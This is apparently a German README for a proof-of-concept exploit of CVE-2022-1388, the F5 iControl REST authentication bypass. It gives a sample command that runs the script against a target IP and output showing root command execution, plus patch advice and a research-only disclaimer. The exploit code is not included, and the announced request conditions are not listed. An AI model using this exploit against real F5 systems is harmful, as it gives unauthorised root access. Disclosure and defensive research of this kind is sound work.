
POC für CVE-2022-1388
PoC für CVE-2022-1388, der mehrere F5-Produkte betrifft.
Eine technische Root-Cause-Analyse der Schwachstelle finden Sie in unserem Blog: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
Notwendige Bedingungen einer Anfrage zur Ausnutzung dieser Schwachstelle:
root@kali:/home/dev# python3 CVE-2022-1388.py -t 192.168.0.221 -c id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
Aktualisieren Sie auf die neueste Version oder befolgen Sie die Anweisungen im F5-Sicherheitshinweis
Diese Software wurde ausschließlich für Zwecke der akademischen Forschung und zur Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, es sei denn, dies wurde ausdrücklich genehmigt. Die Projektverantwortlichen sind nicht verantwortlich oder haftbar für Missbrauch der Software. Verwenden Sie sie verantwortungsbewusst.